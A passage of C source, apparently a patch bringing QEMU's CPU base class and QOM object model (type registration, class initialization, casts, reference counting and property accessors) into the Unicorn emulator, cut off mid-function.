CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + return cc->get_paging_enabled(cpu); +} + +static bool cpu_common_get_paging_enabled(const CPUState *cpu) +{ + return false; +} + +void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list, + Error **errp) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + cc->get_memory_mapping(cpu, list, errp); +} + +static void cpu_common_get_memory_mapping(CPUState *cpu, + MemoryMappingList *list, + Error **errp) +{ + error_setg(errp, "Obtaining memory mappings is unsupported on this CPU."); +} + +void cpu_reset_interrupt(CPUState *cpu, int mask) +{ + cpu->interrupt_request &= ~mask; +} + +void cpu_exit(CPUState *cpu) +{ + cpu->exit_request = 1; + cpu->tcg_exit_req = 1; +} + +static void cpu_common_noop(CPUState 
*cpu) +{ +} + +static bool cpu_common_exec_interrupt(CPUState *cpu, int int_req) +{ + return false; +} + +void cpu_dump_state(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (cc->dump_state) { + cc->dump_state(cpu, f, cpu_fprintf, flags); + } +} + +void cpu_dump_statistics(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (cc->dump_statistics) { + cc->dump_statistics(cpu, f, cpu_fprintf, flags); + } +} + +void cpu_reset(CPUState *cpu) +{ + CPUClass *klass = CPU_GET_CLASS(cpu->uc, cpu); + + if (klass->reset != NULL) { + (*klass->reset)(cpu); + } +} + +static void cpu_common_reset(CPUState *cpu) +{ + CPUClass *cc = CPU_GET_CLASS(cpu->uc, cpu); + + if (qemu_loglevel_mask(CPU_LOG_RESET)) { + qemu_log("CPU Reset (CPU %d)\n", cpu->cpu_index); + log_cpu_state(cpu, cc->reset_dump_flags); + } + + cpu->interrupt_request = 0; + cpu->current_tb = NULL; + cpu->halted = 0; + cpu->mem_io_pc = 0; + cpu->mem_io_vaddr = 0; + cpu->icount_extra = 0; + cpu->icount_decr.u32 = 0; + cpu->can_do_io = 0; + memset(cpu->tb_jmp_cache, 0, TB_JMP_CACHE_SIZE * sizeof(void *)); +} + +static bool cpu_common_has_work(CPUState *cs) +{ + return false; +} + +ObjectClass *cpu_class_by_name(struct uc_struct *uc, const char *typename, const char *cpu_model) +{ + CPUClass *cc = CPU_CLASS(uc, object_class_by_name(uc, typename)); + + return cc->class_by_name(uc, cpu_model); +} + +static ObjectClass *cpu_common_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + return NULL; +} + +static void cpu_common_parse_features(CPUState *cpu, char *features, + Error **errp) +{ + char *featurestr; /* Single "key=value" string being parsed */ + char *val; + Error *err = NULL; + + featurestr = features ? 
/*
 * Realize hook shared by all CPU types: a hot-plugged CPU is resumed as
 * soon as it is realized.  Always succeeds.
 */
static int cpu_common_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp)
{
    CPUState *cpu = CPU(dev);

    if (dev->hotplugged) {
        cpu_resume(cpu);
    }

    return 0;
}

/* Instance-init hook: the base CPU needs no per-instance setup. */
static void cpu_common_initfn(struct uc_struct *uc, Object *obj, void *opaque)
{
}

/* Default arch id: simply the CPU's index. */
static int64_t cpu_common_get_arch_id(CPUState *cpu)
{
    return cpu->cpu_index;
}

/* Install the default implementations of all CPUClass hooks. */
static void cpu_class_init(struct uc_struct *uc, ObjectClass *klass, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(uc, klass);
    CPUClass *k = CPU_CLASS(uc, klass);

    k->class_by_name = cpu_common_class_by_name;
    k->parse_features = cpu_common_parse_features;
    k->reset = cpu_common_reset;
    k->get_arch_id = cpu_common_get_arch_id;
    k->has_work = cpu_common_has_work;
    k->get_paging_enabled = cpu_common_get_paging_enabled;
    k->get_memory_mapping = cpu_common_get_memory_mapping;
    k->debug_excp_handler = cpu_common_noop;
    k->cpu_exec_enter = cpu_common_noop;
    k->cpu_exec_exit = cpu_common_noop;
    k->cpu_exec_interrupt = cpu_common_exec_interrupt;
    dc->realize = cpu_common_realizefn;
    /*
     * Reason: CPUs still need special care by board code: wiring up
     * IRQs, adding reset handlers, halting non-first CPUs, ...
     */
    dc->cannot_instantiate_with_device_add_yet = true;
}

/*
 * Registration record for the abstract TYPE_CPU base type.  The
 * initializer is positional — field order follows Unicorn's TypeInfo
 * declaration in qom/object.h (verify there before reordering).
 */
static const TypeInfo cpu_type_info = {
    TYPE_CPU,
    TYPE_DEVICE,

    sizeof(CPUClass),
    sizeof(CPUState),
    NULL,

    cpu_common_initfn,
    NULL,
    NULL,

    NULL,

    cpu_class_init,
    NULL,
    NULL,

    true,
};

/* Register the abstract CPU base type with @uc's per-instance type table. */
void cpu_register_types(struct uc_struct *uc)
{
    type_register_static(uc, &cpu_type_info);
}

/* ------------------------------------------------------------------ */
/* The patch continues with a new file: qemu/qom/object.c             */
/* ------------------------------------------------------------------ */

/*
 * QEMU Object Model
 *
 * Copyright IBM, Corp. 2011
 *
 * Authors:
 *  Anthony Liguori
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#include "qom/object.h"
#include "qemu-common.h"
#include "qapi/visitor.h"
#include "qapi-visit.h"
#include "qapi/string-input-visitor.h"
#include "qapi/qmp/qerror.h"

/* TODO: replace QObject with a simpler visitor to avoid a dependency
 * of the QOM core on QObject?
 */
*/ +#include "qom/qom-qobject.h" +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qstring.h" + +#include "uc_priv.h" + +#define MAX_INTERFACES 32 + +typedef struct InterfaceImpl InterfaceImpl; +typedef struct TypeImpl TypeImpl; + +struct InterfaceImpl +{ + const char *typename; +}; + +struct TypeImpl +{ + const char *name; + const char *parent; + + size_t class_size; + size_t instance_size; + void *instance_userdata; + + void (*class_init)(struct uc_struct *uc, ObjectClass *klass, void *data); + void (*class_base_init)(ObjectClass *klass, void *data); + void (*class_finalize)(ObjectClass *klass, void *data); + + void *class_data; + + void (*instance_init)(struct uc_struct *uc, Object *obj, void *opaque); + void (*instance_post_init)(struct uc_struct *uc, Object *obj); + void (*instance_finalize)(struct uc_struct *uc, Object *obj, void *opaque); + + bool abstract; + + TypeImpl *parent_type; + ObjectClass *class; + + int num_interfaces; + InterfaceImpl interfaces[MAX_INTERFACES]; +}; + + +static GHashTable *type_table_get(struct uc_struct *uc) +{ + if (uc->type_table == NULL) { + uc->type_table = g_hash_table_new(g_str_hash, g_str_equal); + } + + return uc->type_table; +} + + +static void type_table_add(struct uc_struct *uc, TypeImpl *ti) +{ + assert(!uc->enumerating_types); + g_hash_table_insert(type_table_get(uc), (void *)ti->name, ti); +} + +static TypeImpl *type_table_lookup(struct uc_struct *uc, const char *name) +{ + return g_hash_table_lookup(type_table_get(uc), name); +} + +static TypeImpl *type_new(struct uc_struct *uc, const TypeInfo *info) +{ + TypeImpl *ti = g_malloc0(sizeof(*ti)); + int i; + + g_assert(info->name != NULL); + + if (type_table_lookup(uc, info->name) != NULL) { + fprintf(stderr, "Registering `%s' which already exists\n", info->name); + abort(); + } + + ti->name = g_strdup(info->name); + ti->parent = g_strdup(info->parent); + + ti->class_size = info->class_size; + ti->instance_size = 
info->instance_size; + + ti->class_init = info->class_init; + ti->class_base_init = info->class_base_init; + ti->class_finalize = info->class_finalize; + ti->class_data = info->class_data; + + ti->instance_userdata = info->instance_userdata; + ti->instance_init = info->instance_init; + ti->instance_post_init = info->instance_post_init; + ti->instance_finalize = info->instance_finalize; + + ti->abstract = info->abstract; + + for (i = 0; info->interfaces && info->interfaces[i].type; i++) { + ti->interfaces[i].typename = g_strdup(info->interfaces[i].type); + } + ti->num_interfaces = i; + + return ti; +} + +static TypeImpl *type_register_internal(struct uc_struct *uc, const TypeInfo *info) +{ + TypeImpl *ti; + ti = type_new(uc, info); + + type_table_add(uc, ti); + return ti; +} + +TypeImpl *type_register(struct uc_struct *uc, const TypeInfo *info) +{ + assert(info->parent); + return type_register_internal(uc, info); +} + +TypeImpl *type_register_static(struct uc_struct *uc, const TypeInfo *info) +{ + return type_register(uc, info); +} + +static TypeImpl *type_get_by_name(struct uc_struct *uc, const char *name) +{ + if (name == NULL) { + return NULL; + } + + return type_table_lookup(uc, name); +} + +static TypeImpl *type_get_parent(struct uc_struct *uc, TypeImpl *type) +{ + if (!type->parent_type && type->parent) { + type->parent_type = type_get_by_name(uc, type->parent); + g_assert(type->parent_type != NULL); + } + + return type->parent_type; +} + +static bool type_has_parent(TypeImpl *type) +{ + return (type->parent != NULL); +} + +static size_t type_class_get_size(struct uc_struct *uc, TypeImpl *ti) +{ + if (ti->class_size) { + return ti->class_size; + } + + if (type_has_parent(ti)) { + return type_class_get_size(uc, type_get_parent(uc, ti)); + } + + return sizeof(ObjectClass); +} + +static size_t type_object_get_size(struct uc_struct *uc, TypeImpl *ti) +{ + if (ti->instance_size) { + return ti->instance_size; + } + + if (type_has_parent(ti)) { + return 
/* True when @target_type is @type itself or one of its ancestors. */
static bool type_is_ancestor(struct uc_struct *uc, TypeImpl *type, TypeImpl *target_type)
{
    assert(target_type);

    /* Check if typename is a direct ancestor of type */
    while (type) {
        if (type == target_type) {
            return true;
        }

        type = type_get_parent(uc, type);
    }

    return false;
}

static void type_initialize(struct uc_struct *uc, TypeImpl *ti);

/*
 * Materialize one interface implementation for @ti: a synthetic
 * abstract type named "TYPE::IFACE" whose class is appended to
 * ti->class->interfaces.
 */
static void type_initialize_interface(struct uc_struct *uc, TypeImpl *ti, TypeImpl *interface_type,
                                      TypeImpl *parent_type)
{
    InterfaceClass *new_iface;
    TypeInfo info = { 0 };
    TypeImpl *iface_impl;

    info.parent = parent_type->name;
    info.name = g_strdup_printf("%s::%s", ti->name, interface_type->name);
    info.abstract = true;

    iface_impl = type_new(uc, &info);
    iface_impl->parent_type = parent_type;
    type_initialize(uc, iface_impl);
    g_free((char *)info.name);

    new_iface = (InterfaceClass *)iface_impl->class;
    new_iface->concrete_class = ti->class;
    new_iface->interface_type = interface_type;

    ti->class->interfaces = g_slist_append(ti->class->interfaces,
                                           iface_impl->class);
}

/*
 * Lazily build @ti's ObjectClass: copy the parent class in, rebuild
 * inherited interfaces, add own interfaces (skipping any already
 * satisfied by an ancestor), then run class_base_init from the root
 * down and finally the type's own class_init.  Idempotent.
 */
static void type_initialize(struct uc_struct *uc, TypeImpl *ti)
{
    TypeImpl *parent;

    if (ti->class) {
        return;
    }

    ti->class_size = type_class_get_size(uc, ti);
    ti->instance_size = type_object_get_size(uc, ti);

    ti->class = g_malloc0(ti->class_size);

    parent = type_get_parent(uc, ti);
    if (parent) {
        GSList *e;
        int i;
        type_initialize(uc, parent);

        /* Child class embeds the parent class as a prefix. */
        g_assert(parent->class_size <= ti->class_size);
        memcpy(ti->class, parent->class, parent->class_size);
        ti->class->interfaces = NULL;

        for (e = parent->class->interfaces; e; e = e->next) {
            InterfaceClass *iface = e->data;
            ObjectClass *klass = OBJECT_CLASS(iface);

            type_initialize_interface(uc, ti, iface->interface_type, klass->type);
        }

        for (i = 0; i < ti->num_interfaces; i++) {
            TypeImpl *t = type_get_by_name(uc, ti->interfaces[i].typename);
            for (e = ti->class->interfaces; e; e = e->next) {
                TypeImpl *target_type = OBJECT_CLASS(e->data)->type;

                if (type_is_ancestor(uc, target_type, t)) {
                    break;
                }
            }

            /* Already provided through an inherited interface. */
            if (e) {
                continue;
            }

            type_initialize_interface(uc, ti, t, t);
        }
    }

    ti->class->type = ti;

    while (parent) {
        if (parent->class_base_init) {
            parent->class_base_init(ti->class, ti->class_data);
        }
        parent = type_get_parent(uc, parent);
    }

    if (ti->class_init) {
        ti->class_init(uc, ti->class, ti->class_data);
    }
}

/* Run instance_init hooks from the root ancestor down to @ti. */
static void object_init_with_type(struct uc_struct *uc, Object *obj, TypeImpl *ti)
{
    if (type_has_parent(ti)) {
        object_init_with_type(uc, obj, type_get_parent(uc, ti));
    }

    if (ti->instance_init) {
        ti->instance_init(uc, obj, ti->instance_userdata);
    }
}

/* Run instance_post_init hooks from @ti up to the root ancestor. */
static void object_post_init_with_type(struct uc_struct *uc, Object *obj, TypeImpl *ti)
{
    if (ti->instance_post_init) {
        ti->instance_post_init(uc, obj);
    }

    if (type_has_parent(ti)) {
        object_post_init_with_type(uc, obj, type_get_parent(uc, ti));
    }
}

/*
 * Initialize caller-provided storage of at least @size bytes as an
 * instance of @type: zero it, wire up the class, take the initial
 * reference, and run the init hooks.
 */
static void object_initialize_with_type(struct uc_struct *uc, void *data, size_t size, TypeImpl *type)
{
    Object *obj = data;

    g_assert(type != NULL);
    type_initialize(uc, type);

    g_assert(type->instance_size >= sizeof(Object));
    g_assert(type->abstract == false);
    g_assert(size >= type->instance_size);

    memset(obj, 0, type->instance_size);
    obj->class_ = type->class;
    object_ref(obj);
    QTAILQ_INIT(&obj->properties);
    object_init_with_type(uc, obj, type);
    object_post_init_with_type(uc, obj, type);
}

/* In-place initialization by type name (see object_initialize_with_type). */
void object_initialize(struct uc_struct *uc, void *data, size_t size, const char *typename)
{
    TypeImpl *type = type_get_by_name(uc, typename);

    object_initialize_with_type(uc, data, size, type);
}

/* A property is a child property iff its type string starts "child<". */
static inline bool object_property_is_child(ObjectProperty *prop)
{
    return strstart(prop->type, "child<", NULL);
}

/* Remove and release every property of @obj (used during finalize). */
static void object_property_del_all(struct uc_struct *uc, Object *obj)
{
    while (!QTAILQ_EMPTY(&obj->properties)) {
        ObjectProperty *prop = QTAILQ_FIRST(&obj->properties);

        QTAILQ_REMOVE(&obj->properties, prop, node);

        if (prop->release) {
            prop->release(uc, obj, prop->name, prop->opaque);
        }

        g_free(prop->name);
        g_free(prop->type);
        g_free(prop->description);
        g_free(prop);
    }
}
/* Delete the child property of @obj whose value is @child, if any. */
void object_property_del_child(struct uc_struct *uc, Object *obj, Object *child, Error **errp)
{
    ObjectProperty *prop;

    QTAILQ_FOREACH(prop, &obj->properties, node) {
        if (object_property_is_child(prop) && prop->opaque == child) {
            object_property_del(uc, obj, prop->name, errp);
            break;
        }
    }
}

/* Detach @obj from its parent (drops the parent's reference to it). */
void object_unparent(struct uc_struct *uc, Object *obj)
{
    if (obj->parent) {
        object_property_del_child(uc, obj->parent, obj, NULL);
    }
}

/* Run instance_finalize hooks from @type up to the root ancestor. */
static void object_deinit(struct uc_struct *uc, Object *obj, TypeImpl *type)
{
    if (type->instance_finalize) {
        type->instance_finalize(uc, obj, type->instance_userdata);
    }

    if (type_has_parent(type)) {
        object_deinit(uc, obj, type_get_parent(uc, type));
    }
}

/*
 * Tear an object down once its refcount hits zero: drop all properties,
 * run finalizers, and free the storage if the object owns it.
 */
static void object_finalize(struct uc_struct *uc, void *data)
{
    Object *obj = data;
    TypeImpl *ti = obj->class_->type;

    object_property_del_all(uc, obj);
    object_deinit(uc, obj, ti);

    g_assert(obj->ref == 0);
    if (obj->free) {
        obj->free(obj);
    }
}

/* Heap-allocate and initialize a new instance of @type (refcount 1). */
static Object *object_new_with_type(struct uc_struct *uc, Type type)
{
    Object *obj;

    g_assert(type != NULL);
    type_initialize(uc, type);

    obj = g_malloc(type->instance_size);
    object_initialize_with_type(uc, obj, type->instance_size, type);
    obj->free = g_free;

    return obj;
}

/* Allocate a new instance by type name. */
Object *object_new(struct uc_struct *uc, const char *typename)
{
    TypeImpl *ti = type_get_by_name(uc, typename);

    return object_new_with_type(uc, ti);
}

/* Checked downcast: @obj if it is an instance of @typename, else NULL. */
Object *object_dynamic_cast(struct uc_struct *uc, Object *obj, const char *typename)
{
    if (obj && object_class_dynamic_cast(uc, object_get_class(obj), typename)) {
        return obj;
    }

    return NULL;
}

/*
 * Asserting downcast used by the OBJECT_CHECK() style macros.  With
 * CONFIG_QOM_CAST_DEBUG the cast is verified (aborting with a
 * file:line:function diagnostic on failure) and a small per-class
 * cache of recently verified type names is maintained; otherwise the
 * pointer is returned unchecked.
 */
Object *object_dynamic_cast_assert(struct uc_struct *uc, Object *obj, const char *typename,
                                   const char *file, int line, const char *func)
{
#ifdef CONFIG_QOM_CAST_DEBUG
    int i;
    Object *inst;

    for (i = 0; obj && i < OBJECT_CLASS_CAST_CACHE; i++) {
        if (obj->class->object_cast_cache[i] == typename) {
            goto out;
        }
    }

    inst = object_dynamic_cast(uc, obj, typename);

    if (!inst && obj) {
        fprintf(stderr, "%s:%d:%s: Object %p is not an instance of type %s\n",
                file, line, func, obj, typename);
        abort();
    }

    assert(obj == inst);

    if (obj && obj == inst) {
        /* LRU-style shift; newest entry goes to the last slot. */
        for (i = 1; i < OBJECT_CLASS_CAST_CACHE; i++) {
            obj->class->object_cast_cache[i - 1] =
                obj->class->object_cast_cache[i];
        }
        obj->class->object_cast_cache[i - 1] = typename;
    }

out:
#endif
    return obj;
}

/*
 * Class-level cast: return the ObjectClass for @typename if @class is
 * (or implements, via a unique interface) that type, else NULL.  An
 * ambiguous interface match also yields NULL.
 */
ObjectClass *object_class_dynamic_cast(struct uc_struct *uc, ObjectClass *class,
                                       const char *typename)
{
    ObjectClass *ret = NULL;
    TypeImpl *target_type;
    TypeImpl *type;

    if (!class) {
        return NULL;
    }

    /* A simple fast path that can trigger a lot for leaf classes.
     * Note this is a pointer comparison: it assumes the caller passed
     * the interned TYPE_* name literal.  */
    type = class->type;
    if (type->name == typename) {
        return class;
    }

    target_type = type_get_by_name(uc, typename);
    if (!target_type) {
        /* target class type unknown, so fail the cast */
        return NULL;
    }

    if (type->class->interfaces &&
            type_is_ancestor(uc, target_type, uc->type_interface)) {
        int found = 0;
        GSList *i;

        for (i = class->interfaces; i; i = i->next) {
            ObjectClass *target_class = i->data;

            if (type_is_ancestor(uc, target_class->type, target_type)) {
                ret = target_class;
                found++;
            }
        }

        /* The match was ambiguous, don't allow a cast */
        if (found > 1) {
            ret = NULL;
        }
    } else if (type_is_ancestor(uc, type, target_type)) {
        ret = class;
    }

    return ret;
}
/*
 * Asserting variant of object_class_dynamic_cast(); aborts with a
 * file:line:function diagnostic when the cast fails.  With
 * CONFIG_QOM_CAST_DEBUG a per-class cache of verified names is kept;
 * without it, classes that implement no interfaces skip the check
 * entirely (an ancestor cast cannot change the pointer then).
 */
ObjectClass *object_class_dynamic_cast_assert(struct uc_struct *uc, ObjectClass *class,
                                              const char *typename,
                                              const char *file, int line,
                                              const char *func)
{
    ObjectClass *ret;

#ifdef CONFIG_QOM_CAST_DEBUG
    int i;

    for (i = 0; class && i < OBJECT_CLASS_CAST_CACHE; i++) {
        if (class->class_cast_cache[i] == typename) {
            ret = class;
            goto out;
        }
    }
#else
    if (!class || !class->interfaces) {
        return class;
    }
#endif

    ret = object_class_dynamic_cast(uc, class, typename);
    if (!ret && class) {
        fprintf(stderr, "%s:%d:%s: Object %p is not an instance of type %s\n",
                file, line, func, class, typename);
        abort();
    }

#ifdef CONFIG_QOM_CAST_DEBUG
    if (class && ret == class) {
        for (i = 1; i < OBJECT_CLASS_CAST_CACHE; i++) {
            class->class_cast_cache[i - 1] = class->class_cast_cache[i];
        }
        class->class_cast_cache[i - 1] = typename;
    }
out:
#endif
    return ret;
}

/* Name of the concrete type of @obj. */
const char *object_get_typename(Object *obj)
{
    return obj->class_->type->name;
}

/* Class of @obj. */
ObjectClass *object_get_class(Object *obj)
{
    return obj->class_;
}

/* Whether @klass's type is abstract (cannot be instantiated). */
bool object_class_is_abstract(ObjectClass *klass)
{
    return klass->type->abstract;
}

/* Type name of @klass. */
const char *object_class_get_name(ObjectClass *klass)
{
    return klass->type->name;
}

/* Look a class up by type name, initializing the type on demand. */
ObjectClass *object_class_by_name(struct uc_struct *uc, const char *typename)
{
    TypeImpl *type = type_get_by_name(uc, typename);

    if (!type) {
        return NULL;
    }

    type_initialize(uc, type);

    return type->class;
}

/* Parent class of @class, or NULL at the root of the hierarchy. */
ObjectClass *object_class_get_parent(struct uc_struct *uc, ObjectClass *class)
{
    TypeImpl *type = type_get_parent(uc, class->type);

    if (!type) {
        return NULL;
    }

    type_initialize(uc, type);

    return type->class;
}

/* Closure passed through g_hash_table_foreach in object_class_foreach(). */
typedef struct OCFData
{
    void (*fn)(ObjectClass *klass, void *opaque);
    const char *implements_type;
    bool include_abstract;
    void *opaque;
    struct uc_struct *uc;
} OCFData;

/* Per-type trampoline: filter by abstractness/interface, then call fn. */
static void object_class_foreach_tramp(gpointer key, gpointer value,
                                       gpointer opaque)
{
    OCFData *data = opaque;
    TypeImpl *type = value;
    ObjectClass *k;

    type_initialize(data->uc, type);
    k = type->class;

    if (!data->include_abstract && type->abstract) {
        return;
    }

    if (data->implements_type &&
        !object_class_dynamic_cast(data->uc, k, data->implements_type)) {
        return;
    }

    data->fn(k, data->opaque);
}

/*
 * Invoke @fn for every registered class, optionally restricted to
 * classes implementing @implements_type and/or excluding abstract
 * types.  Registration is locked out while enumerating.
 */
void object_class_foreach(struct uc_struct *uc, void (*fn)(ObjectClass *klass, void *opaque),
                          const char *implements_type, bool include_abstract,
                          void *opaque)
{
    OCFData data = { fn, implements_type, include_abstract, opaque, uc };

    uc->enumerating_types = true;
    g_hash_table_foreach(type_table_get(uc), object_class_foreach_tramp, &data);
    uc->enumerating_types = false;
}

/*
 * Call @fn for each direct child of @obj; stop early when @fn returns
 * non-zero, and return that value (0 otherwise).
 */
int object_child_foreach(Object *obj, int (*fn)(Object *child, void *opaque),
                         void *opaque)
{
    ObjectProperty *prop, *next;
    int ret = 0;

    QTAILQ_FOREACH_SAFE(prop, &obj->properties, node, next) {
        if (object_property_is_child(prop)) {
            ret = fn(prop->opaque, opaque);
            if (ret != 0) {
                break;
            }
        }
    }
    return ret;
}

/* foreach callback that collects classes into a GSList. */
static void object_class_get_list_tramp(ObjectClass *klass, void *opaque)
{
    GSList **list = opaque;

    *list = g_slist_prepend(*list, klass);
}

/* Collect all classes matching the filter into a newly built GSList. */
GSList *object_class_get_list(struct uc_struct *uc, const char *implements_type,
                              bool include_abstract)
{
    GSList *list = NULL;

    object_class_foreach(uc, object_class_get_list_tramp,
                         implements_type, include_abstract, &list);
    return list;
}
/* Take a reference on @obj (NULL-tolerant). */
void object_ref(Object *obj)
{
    if (!obj) {
        return;
    }
    atomic_inc(&obj->ref);
}

/* Drop a reference; finalize the object when the last one goes away. */
void object_unref(struct uc_struct *uc, Object *obj)
{
    if (!obj) {
        return;
    }
    g_assert(obj->ref > 0);

    /* parent always holds a reference to its children */
    if (atomic_fetch_dec(&obj->ref) == 1) {
        object_finalize(uc, obj);
    }
}

/*
 * Register a property on @obj.
 *
 * A name ending in "[*]" is auto-numbered: the code retries "name[0]",
 * "name[1]", ... until a free slot is found (the recursive call's
 * duplicate check provides the probe).  Duplicate explicit names are
 * reported through @errp.  Returns the new property, or NULL on error.
 */
ObjectProperty *
object_property_add(Object *obj, const char *name, const char *type,
                    ObjectPropertyAccessor *get,
                    ObjectPropertySetAccessor *set,
                    ObjectPropertyRelease *release,
                    void *opaque, Error **errp)
{
    ObjectProperty *prop;
    size_t name_len = strlen(name);

    /* memcmp over 4 bytes deliberately includes the NUL terminator, so
     * only names that end exactly in "[*]" match. */
    if (name_len >= 3 && !memcmp(name + name_len - 3, "[*]", 4)) {
        int i;
        ObjectProperty *ret;
        char *name_no_array = g_strdup(name);

        name_no_array[name_len - 3] = '\0';
        for (i = 0; ; ++i) {
            char *full_name = g_strdup_printf("%s[%d]", name_no_array, i);

            ret = object_property_add(obj, full_name, type, get, set,
                                      release, opaque, NULL);
            g_free(full_name);
            if (ret) {
                break;
            }
        }
        g_free(name_no_array);
        return ret;
    }

    QTAILQ_FOREACH(prop, &obj->properties, node) {
        if (strcmp(prop->name, name) == 0) {
            error_setg(errp, "attempt to add duplicate property '%s'"
                       " to object (type '%s')", name,
                       object_get_typename(obj));
            return NULL;
        }
    }

    prop = g_malloc0(sizeof(*prop));

    prop->name = g_strdup(name);
    prop->type = g_strdup(type);

    prop->get = get;
    prop->set = set;
    prop->release = release;
    prop->opaque = opaque;

    QTAILQ_INSERT_TAIL(&obj->properties, prop, node);
    return prop;
}

/* Find a property by name; reports through @errp when absent. */
ObjectProperty *object_property_find(Object *obj, const char *name,
                                     Error **errp)
{
    ObjectProperty *prop;

    QTAILQ_FOREACH(prop, &obj->properties, node) {
        if (strcmp(prop->name, name) == 0) {
            return prop;
        }
    }

    error_setg(errp, "Property '.%s' not found", name);
    return NULL;
}

/* Remove a property: run its release hook, unlink it, free its memory. */
void object_property_del(struct uc_struct *uc, Object *obj, const char *name, Error **errp)
{
    ObjectProperty *prop = object_property_find(obj, name, errp);
    if (prop == NULL) {
        return;
    }

    if (prop->release) {
        prop->release(uc, obj, name, prop->opaque);
    }

    QTAILQ_REMOVE(&obj->properties, prop, node);

    g_free(prop->name);
    g_free(prop->type);
    g_free(prop->description);
    g_free(prop);
}

/* Read a property through visitor @v; write-only properties error out. */
void object_property_get(struct uc_struct *uc, Object *obj, Visitor *v, const char *name,
                         Error **errp)
{
    ObjectProperty *prop = object_property_find(obj, name, errp);
    if (prop == NULL) {
        return;
    }

    if (!prop->get) {
        error_set(errp, QERR_PERMISSION_DENIED);
    } else {
        prop->get(uc, obj, v, prop->opaque, name, errp);
    }
}

/* Write a property through visitor @v; read-only properties error out. */
void object_property_set(struct uc_struct *uc, Object *obj, Visitor *v, const char *name,
                         Error **errp)
{
    ObjectProperty *prop = object_property_find(obj, name, errp);
    if (prop == NULL) {
        return;
    }

    if (!prop->set) {
        error_set(errp, QERR_PERMISSION_DENIED);
    } else {
        /* setters return non-zero on failure */
        if (prop->set(uc, obj, v, prop->opaque, name, errp))
            error_set(errp, QERR_UNDEFINED_ERROR);
    }
}

/* Set a property from a C string (wrapped in a QString). */
void object_property_set_str(struct uc_struct *uc, Object *obj, const char *value,
                             const char *name, Error **errp)
{
    QString *qstr = qstring_from_str(value);
    object_property_set_qobject(uc, obj, QOBJECT(qstr), name, errp);

    QDECREF(qstr);
}

/*
 * Read a property as a newly allocated C string (caller frees), or
 * NULL with @errp set on read failure or type mismatch.
 */
char *object_property_get_str(struct uc_struct *uc, Object *obj, const char *name,
                              Error **errp)
{
    QObject *ret = object_property_get_qobject(uc, obj, name, errp);
    QString *qstring;
    char *retval;

    if (!ret) {
        return NULL;
    }
    qstring = qobject_to_qstring(ret);
    if (!qstring) {
        error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, "string");
        retval = NULL;
    } else {
        retval = g_strdup(qstring_get_str(qstring));
    }

    QDECREF(qstring);
    return retval;
}

/* Set a link property to @value's canonical path ("" clears the link). */
void object_property_set_link(struct uc_struct *uc, Object *obj, Object *value,
                              const char *name, Error **errp)
{
    if (value) {
        gchar *path = object_get_canonical_path(value);
        object_property_set_str(uc, obj, path, name, errp);
        g_free(path);
    } else {
        object_property_set_str(uc, obj, "", name, errp);
    }
}
/*
 * Read a link property and resolve its stored path to an Object; NULL
 * (with @errp on lookup failure) when the link is unset or dangling.
 */
Object *object_property_get_link(struct uc_struct *uc, Object *obj, const char *name,
                                 Error **errp)
{
    char *str = object_property_get_str(uc, obj, name, errp);
    Object *target = NULL;

    if (str && *str) {
        target = object_resolve_path(uc, str, NULL);
        if (!target) {
            error_set(errp, QERR_DEVICE_NOT_FOUND, str);
        }
    }

    g_free(str);
    return target;
}

/* Set a property from a bool (wrapped in a QBool). */
void object_property_set_bool(struct uc_struct *uc, Object *obj, bool value,
                              const char *name, Error **errp)
{
    QBool *qbool = qbool_from_int(value);
    object_property_set_qobject(uc, obj, QOBJECT(qbool), name, errp);

    QDECREF(qbool);
}

/* Read a property as a bool; false with @errp set on type mismatch. */
bool object_property_get_bool(struct uc_struct *uc, Object *obj, const char *name,
                              Error **errp)
{
    QObject *ret = object_property_get_qobject(uc, obj, name, errp);
    QBool *qbool;
    bool retval;

    if (!ret) {
        return false;
    }
    qbool = qobject_to_qbool(ret);
    if (!qbool) {
        error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, "boolean");
        retval = false;
    } else {
        retval = qbool_get_int(qbool);
    }

    QDECREF(qbool);
    return retval;
}

/* Set a property from an int64 (wrapped in a QInt). */
void object_property_set_int(struct uc_struct *uc, Object *obj, int64_t value,
                             const char *name, Error **errp)
{
    QInt *qint = qint_from_int(value);
    object_property_set_qobject(uc, obj, QOBJECT(qint), name, errp);

    QDECREF(qint);
}

/* Read a property as an int64; -1 with @errp set on type mismatch. */
int64_t object_property_get_int(struct uc_struct *uc, Object *obj, const char *name,
                                Error **errp)
{
    QObject *ret = object_property_get_qobject(uc, obj, name, errp);
    QInt *qint;
    int64_t retval;

    if (!ret) {
        return -1;
    }
    qint = qobject_to_qint(ret);
    if (!qint) {
        error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, "int");
        retval = -1;
    } else {
        retval = qint_get_int(qint);
    }

    QDECREF(qint);
    return retval;
}

/* Set a property from its string representation via the string visitor. */
void object_property_parse(struct uc_struct *uc, Object *obj, const char *string,
                           const char *name, Error **errp)
{
    StringInputVisitor *mi;
    mi = string_input_visitor_new(string);
    object_property_set(uc, obj, string_input_get_visitor(mi), name, errp);

    string_input_visitor_cleanup(mi);
}

/* Type string of a property (e.g. "string", "child<...>"); NULL if absent. */
const char *object_property_get_type(Object *obj, const char *name, Error **errp)
{
    ObjectProperty *prop = object_property_find(obj, name, errp);
    if (prop == NULL) {
        return NULL;
    }

    return prop->type;
}

/* Root of the composition tree, created lazily as a "container". */
Object *object_get_root(struct uc_struct *uc)
{
    if (!uc->root) {
        uc->root = object_new(uc, "container");
    }

    return uc->root;
}

/* Getter for child properties: yields the child's canonical path. */
static void object_get_child_property(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque,
                                      const char *name, Error **errp)
{
    Object *child = opaque;
